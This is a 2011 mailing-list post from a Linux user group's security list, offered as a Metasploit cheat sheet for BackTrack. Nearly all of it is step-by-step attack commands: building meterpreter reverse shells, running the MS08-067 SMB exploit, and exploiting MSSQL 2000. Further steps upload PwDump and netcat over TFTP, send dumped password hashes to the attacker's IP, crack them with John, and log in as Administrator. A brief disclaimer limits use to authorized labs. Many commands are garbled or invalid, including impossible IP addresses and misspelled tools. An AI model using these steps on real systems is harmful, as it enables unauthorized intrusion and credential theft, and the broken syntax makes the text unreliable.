[Plug-security] Basic Metasploit CHEAT Sheet

Lisa Kachold lisakachold at obnosis.com
Tue Jan 18 11:30:29 MST 2011 

Okay, you guys, here's a couple of HowTo's for basic Metasploit from
Backtrack4R1:

0) Quick Windows MultiHandler Reverse Shell

startx
/etc/init.d/./wicd start
{check your wireless or wired connection is working}
mfspayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444
>/root/payload.exe
optimize /root/putty.exe (for Windows target)
msfconsole
mfs> use exploit/multihander
mfs> set PAYLOAD windows/meterpreter/reverse_tcp
mfs> show options
mfs> set RHOST (local host ip)
mfs> shell go
mfsconsole > migrate <process #>
example  msfconsole > migrate 256
mfs> show explore
mfs> use name (from show explore)
mfs> set PAYLOAD
mfs> set RHOST
mfs> set LHOST

1) Nmap Mssql 2000
nmap -sT -0 10.10.10.254
nmap -sV 10.10.10.254
mfsconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu---->System-->MISC--->TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
cp wordlist.txt.gz /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc,exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john -show pwdmp4.txt
john -w:wordlist.txt -f:NT pwdmp4.txt
<back to Windows>
nc -L -p 10.10.10.254
<back to BT linux shell>
telnet victim - login as Administrator with password

2) Quick VNC using Autopwn
mfsconsole
db_create foo
db_nmap <targetip or> 10.10.10.254
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
mfsconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>

4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./mfsconsole
<another shell>
./nessus
 Start a scan and Generate a Report
mfs> help
mfs> db_create /root/database/foobar.db
mfs> db_import
      Cross reference from report showing exploit port open and probable
reported from Nessus
Save output of the Nessus report to /root/nessus.nbe
mfs> db_import_nessus_nbe /root/nessus.nbe
mfs> db_autopwn -p -e
Viola!

*
**DISCLAIMER:  The use of Backtrack4R2 is advocated in pentest laboratories
only and for fully qualified professionals after written Corporate
approval.  We do not advocate "cracking" and prefer the definition
hacker<http://hacker.>in it's original term meaning those who reverse
engineer and creatively
evaluate to learn.  We do not advocate "learning to hack"; instead hacking
to learn.*

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com
January 29, 2011, Noon until 3PM.

-- 

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-security/attachments/20110118/dfa6c6f1/attachment.html>

More information about the Plug-security mailing list